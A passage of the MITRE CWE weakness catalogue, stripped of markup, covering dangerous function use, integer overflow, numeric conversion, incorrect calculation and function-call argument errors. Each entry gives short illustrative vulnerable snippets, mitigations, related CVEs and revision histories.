CVE-2019-15118 - USB-audio driver's descriptor code parsing allows unlimited recursion leading to stack exhaustion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118 - - - - CPU - - - - A9 - Denial of Service - CWE More Specific - - - SFP13 - Unrestricted Consumption - - - ASCRM-CWE-674 - - - - - - - - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Demonstrative_Examples, Description, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - - - - The product performs the same operation on a resource two or more times, when the operation should only be applied once. - - - - - - - - - - - Implementation - - - - - Other - Other - - - - This weakness is probably closely associated with other issues related to doubling, such as CWE-462 (duplicate key in alist) or CWE-102 (Struts duplicate validation forms). It's usually a case of an API contract violation (CWE-227). - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships, Relevant_Properties, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The program invokes a potentially dangerous function that could introduce a vulnerability if it is used incorrectly, but the function can also be used safely. - - - - - - Primary - - - Indirect - - - - - - - - - Architecture and Design - - - Implementation - - - High - - - Other - Varies by Context - Quality Degradation - Unexpected State - If the function is used incorrectly, then it could result in security problems. - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - Cost effective for partial coverage: - - - Binary / Bytecode Quality Analysis - Binary / Bytecode simple extractor - strings, ELF readers, etc. - - - - - High - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Debugger - - - Cost effective for partial coverage: - - - Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - Cost effective for partial coverage: - - - Warning Flags - Source Code Quality Analyzer - - - - - High - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Origin Analysis - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Build and Compilation - Implementation - Identify a list of prohibited API functions and prohibit developers from using these functions, providing safer alternatives. In some cases, automatic code analysis tools or the compiler can be instructed to spot use of prohibited functions, such as the "banned.h" include file from Microsoft's SDL. [REF-554] [REF-7] - - - - - The following code attempts to create a local copy of a buffer to perform some manipulations to the data. - - void manipulate_string(char * string){char buf[24];strcpy(buf, string);...} - - However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter. - - - - - CVE-2007-1470 - Library has multiple buffer overflows using sprintf() and strcpy() - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1470 - - - CVE-2009-3849 - Buffer overflow using strcat() - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3849 - - - CVE-2006-2114 - Buffer overflow using strcpy() - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2114 - - - CVE-2006-0963 - Buffer overflow using strcpy() - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0963 - - - CVE-2011-0712 - Vulnerable use of strcpy() changed to use safer strlcpy() - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0712 - - - CVE-2008-5005 - Buffer overflow using strcpy() - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5005 - - - - - Dangerous Functions - - - CON33-C - Avoid race conditions when using library functions - CWE More Abstract - - - ENV33-C - Do not call system() - CWE More Abstract - - - ERR07-C - Prefer functions that support error checking over equivalent functions that don't - - - ERR34-C - Detect errors when converting a string to a number - CWE More Abstract - - - FIO01-C - Be careful using functions that use file names for identification - - - MSC30-C - Do not use the rand() function for generating pseudorandom numbers - CWE More Abstract - - - STR31-C - Guarantee that storage for strings has sufficient space for character data and the null terminator - Imprecise - - - SFP3 - Use of an improper API - - - - - - - - - - This weakness is different than CWE-242 (Use of Inherently Dangerous Function). CWE-242 covers functions with such significant security problems that they can never be guaranteed to be safe. Some functions, if used properly, do not directly pose a security risk, but can introduce a weakness if not called correctly. These are regarded as potentially dangerous. A well-known example is the strcpy() function. When provided with a destination buffer that is larger than its source, strcpy() will not overflow. However, it is so often misused that some developers prohibit strcpy() entirely. - - - - 7 Pernicious Kingdoms - 2008-04-11 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples, Other_Notes, References, Relationship_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences, Observed_Examples, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Related_Attack_Patterns, Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Detection_Factors, References, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The product performs a calculation to determine how much memory to allocate, but an integer overflow can occur that causes less memory to be allocated than expected, leading to a buffer overflow. - - - - - - - - - - Integrity - Availability - Confidentiality - Modify Memory - DoS: Crash, Exit, or Restart - Execute Unauthorized Code or Commands - - - - - CVE-2017-1000121 - chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000121 - - - - - INT30-C - Ensure that unsigned integer operations do not wrap - Imprecise - - - INT32-C - Ensure that operations on signed integers do not result in overflow - Imprecise - - - MEM35-C - Allocate sufficient memory for an object - CWE More Abstract - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Observed_Examples, Relationships, Relevant_Properties, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - - - When converting from one data type to another, such as long to integer, data can be omitted or translated in a way that produces unexpected values. If the resulting values are used in a sensitive context, then dangerous behaviors may occur. - - - - - - - - - - - Implementation - - - High - - - Other - Integrity - Unexpected State - Quality Degradation - The program could wind up using the wrong number and generate incorrect results. If the number is used to allocate resources or make a security decision, then this could introduce a vulnerability. - - - - - Implementation - Avoid making conversion between numeric types. Always check for the allowed ranges. - - - - - In the following Java example, a float literal is cast to an integer, thus causing a loss of precision. - - int i = (int) 33457.8f; - - - - This code adds a float and an integer together, casting the result to an integer. - - $floatVal = 1.8345;$intVal = 3;$result = (int)$floatVal + $intVal; - - Normally, PHP will preserve the precision of this operation, making $result = 4.8345. After the cast to int, it is reasonable to expect PHP to follow rounding convention and set $result = 5. However, the explicit cast to int always rounds DOWN, so the final value of $result is 4. This behavior may have unintended consequences. - - - In this example the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned int, amount will be implicitly converted to unsigned. - - unsigned int readdata () {int amount = 0;...if (result == ERROR)amount = -1;...return amount;} - - If the error condition in the code above is met, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers. - - - In this example, depending on the return value of accecssmainframe(), the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned value, amount will be implicitly cast to an unsigned number. - - unsigned int readdata () {int amount = 0;...amount = accessmainframe();...return amount;} - - If the return value of accessmainframe() is -1, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers. - - - - - CVE-2007-4268 - Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268 - - - CVE-2007-4988 - Chain: signed short width value in image processor is sign extended during conversion to unsigned int, which leads to integer overflow and heap-based buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4988 - - - CVE-2009-0231 - Integer truncation of length value leads to heap-based buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0231 - - - CVE-2008-3282 - Size of a particular type changes for 64-bit platforms, leading to an integer truncation in document processor causes incorrect index to be generated. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3282 - - - - - FLP34-C - Ensure that floating point conversions are within range of the new type - CWE More Abstract - - - INT15-C - Use intmax_t or uintmax_t for formatted IO on programmer-defined integer types - - - INT31-C - Ensure that integer conversions do not result in lost or misinterpreted data - CWE More Abstract - - - INT35-C - Evaluate integer expressions in a larger size before comparing or assigning to that size - - - NUM12-J - Ensure conversions of numeric types to narrower types do not result in lost or misinterpreted data - - - SFP1 - Glitch in computation - - - ASCSM-CWE-681 - - - - - - - - CWE Community - 2008-04-11 - Submitted by members of the CWE community to extend early CWE versions - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Likelihood_of_Exploit, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Observed_Examples, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - The software performs a calculation that generates incorrect or unintended results that are later used in security-critical decisions or resource management. - When software performs a security-critical calculation incorrectly, it might lead to incorrect resource allocations, incorrect privilege assignments, or failed comparisons among other things. Many of the direct results of an incorrect calculation can lead to even larger problems such as failed protection mechanisms or even arbitrary code execution. - - - - - - - - - - Architecture and Design - - - Implementation - - - High - - - Availability - DoS: Crash, Exit, or Restart - If the incorrect calculation causes the program to move into an unexpected state, it may lead to a crash or impairment of service. - - - Integrity - Confidentiality - Availability - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (Other) - Execute Unauthorized Code or Commands - If the incorrect calculation is used in the context of resource allocation, it could lead to an out-of-bounds operation (CWE-119) leading to a crash or even arbitrary code execution. Alternatively, it may result in an integer overflow (CWE-190) and / or a resource consumption problem (CWE-400). - - - Access Control - Gain Privileges or Assume Identity - In the context of privilege or permissions assignment, an incorrect calculation can provide an attacker with access to sensitive resources. - - - Access Control - Bypass Protection Mechanism - If the incorrect calculation leads to an insufficient comparison (CWE-697), it may compromise a protection mechanism such as a validation routine and allow an attacker to bypass the security-critical code. - - - - - Manual Analysis - - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. - Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program. - - High - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - - - Implementation - Understand your programming language's underlying representation and how it interacts with numeric calculation. Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, "not-a-number" calculations, and how your language handles numbers that are too large or too small for its underlying representation. - - - Implementation - Input Validation - Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range. - - - Implementation - Use the appropriate type for the desired action. For example, in C/C++, only use unsigned types for values that could never be negative, such as height, width, or other numbers related to quantity. - - - Architecture and Design - Language Selection - - Use languages, libraries, or frameworks that make it easier to handle numbers without unexpected consequences. - Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). - - - - Architecture and Design - Libraries or Frameworks - - Use languages, libraries, or frameworks that make it easier to handle numbers without unexpected consequences. - Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). - - - - Implementation - Compilation or Build Hardening - Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system. - - - Testing - Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. - - - Testing - Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - - - - - The following image processing code allocates a table for images. - - img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);... - - This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119). - - - This code attempts to calculate a football team's average number of yards gained per touchdown. - - ...int touchdowns = team.getTouchdowns();int yardsGained = team.getTotalYardage();System.out.println(team.getName() + " averages " + yardsGained / touchdowns + "yards gained for every touchdown scored");... - - The code does not consider the event that the team they are querying has not scored a touchdown, but has gained yardage. In that case, we should expect an ArithmeticException to be thrown by the JVM. This could lead to a loss of availability if our error handling code is not set up correctly. - - - This example attempts to calculate the position of the second byte of a pointer. - - int *p = x;char * second_char = (char *)(p + 1); - - In this example, second_char is intended to point to the second byte of p. But, adding 1 to p actually adds sizeof(int) to p, giving a result that is incorrect (3 bytes off on 32-bit platforms). If the resulting memory address is read, this could potentially be an information leak. If it is a write, it could be a security-critical write to unauthorized memory-- whether or not it is a buffer overflow. Note that the above code may also be wrong in other ways, particularly in a little endian environment. - - - - - CVE-2020-0022 - chain: mobile phone Bluetooth implementation does not include offset when calculating packet length (CWE-682), leading to out-of-bounds write (CWE-787) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0022 - - - CVE-2004-1363 - substitution overflow: buffer overflow using environment variables that are expanded after the length check is performed - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1363 - - - - - FLP32-C - Prevent or detect domain and range errors in math functions - CWE More Abstract - - - INT07-C - Use only explicitly signed or unsigned char type for numeric values - - - INT13-C - Use bitwise operators only on unsigned operands - - - INT33-C - Ensure that division and remainder operations do not result in divide-by-zero errors - CWE More Abstract - - - INT34-C - Do not shift an expression by a negative number of bits or by greater than or equal to the number of bits that exist in the operand - CWE More Abstract - - - - - - - - - - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2008-10-14 - updated Type - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-10-29 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Detection_Factors, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Observed_Examples, Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - - - - The software calls a function, procedure, or routine, but the caller specifies the arguments in an incorrect order, leading to resultant weaknesses. - While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers or types of arguments, such as format strings in C. It also can occur in languages or environments that do not enforce strong typing. - - - - - - Primary - - - - - Implementation - This problem typically occurs when the programmer makes a typo, or copy and paste errors. - - - - - Other - Quality Degradation - - - - - Implementation - Use the function, procedure, or routine as specified. - - - Testing - Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type. - - - - - The following PHP method authenticates a user given a username/password combination but is called with the parameters in reverse order. - - function authenticate($username, $password) { - - - // authenticate user - ... - } - authenticate($_POST['password'], $_POST['username']); - - - - - - CVE-2006-7049 - Application calls functions with arguments in the wrong order, allowing attacker to bypass intended access restrictions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7049 - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Modes_of_Introduction, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The code does not function according to its published specifications, potentially leading to incorrect usage. - When providing functionality to an external party, it is important that the software behaves in accordance with the details specified. When requirements of nuances are not documented, the functionality may produce unintended behaviors for the caller, possibly leading to an exploitable state. - - - - - - Indirect - - - Primary - - - - - Implementation - - - - - Other - Quality Degradation - - - - - Implementation - Ensure that your code strictly conforms to specifications. - - - - - PRE09-C - Do not replace secure functions with less secure functions - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Type - - - CWE Content Team - MITRE - 2019-01-03 - updated Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Failure to Provide Specified Functionality - - - - The software calls a function, procedure, or routine, but the caller specifies too many arguments, or too few arguments, which may lead to undefined behavior and resultant weaknesses. - - - - - - Primary - - - - - - - - - Implementation - This problem typically occurs when the programmer makes a typo, or copy and paste errors. - - - - - Other - Quality Degradation - - - - - Other - While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers of arguments, such as format strings in C. It also can occur in languages or environments that do not require that functions always be called with the correct number of arguments, such as Perl. - - - - - Testing - Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type. - - - - - SFP1 - Glitch in computation - - - EXP37-C - Call functions with the correct number and type of arguments - CWE More Specific - - - FIO47-C - Use valid format strings - Imprecise - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 2009-10-29 - updated Modes_of_Introduction, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software calls a function, procedure, or routine, but the caller specifies an argument that is the wrong data type, which may lead to resultant weaknesses. - This weakness is most likely to occur in loosely typed languages, or in strongly typed languages in which the types of variable arguments cannot be enforced at compilation time, or where there is implicit casting. - - - - - - Primary - - - - - Implementation - - - - - Other - Quality Degradation - - - - - Testing - Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type. - - - - - EXP37-C - Call functions with the correct number and type of arguments - CWE More Specific - - - FIO47-C - Use valid format strings - Imprecise - - - POS34-C - Do not call putenv() with a pointer to an automatic variable as the argument - - - STR37-C - Arguments to character handling functions must be representable as an unsigned char - - - SFP1 - Glitch in computation - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software calls a function, procedure, or routine, but the caller specifies an argument that contains the wrong value, which may lead to resultant weaknesses. - - - - - - Primary - - - - - Implementation - - - - - Other - Quality Degradation - - - - - Manual Static Analysis - This might require an understanding of intended program behavior or design to determine whether the value is incorrect. - - - - - This Perl code intends to record whether a user authenticated successfully or not, and to exit if the user fails to authenticate. However, when it calls ReportAuth(), the third argument is specified as 0 instead of 1, so it does not exit. - - sub ReportAuth {my ($username, $result, $fatal) = @_;PrintLog("auth: username=%s, result=%d", $username, $result);if (($result ne "success") && $fatal) {die "Failed!\n";}} - sub PrivilegedFunc{my $result = CheckAuth($username);ReportAuth($username, $result, 0);DoReallyImportantStuff();} - - - - - - MEM04-C - Do not perform zero length allocations - - - SFP24 - Tainted input to command - - - - When primary, this weakness is most likely to occur in rarely-tested code, since the wrong value can change the semantic meaning of the program's execution and lead to obviously-incorrect behavior. It can also be resultant from issues in which the program assigns the wrong value to a variable, and that variable is later used in a function call. In that sense, this issue could be argued as having chaining relationships with many implementation errors in CWE. - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2008-09-08 - updated Detection_Factors, Relationships, 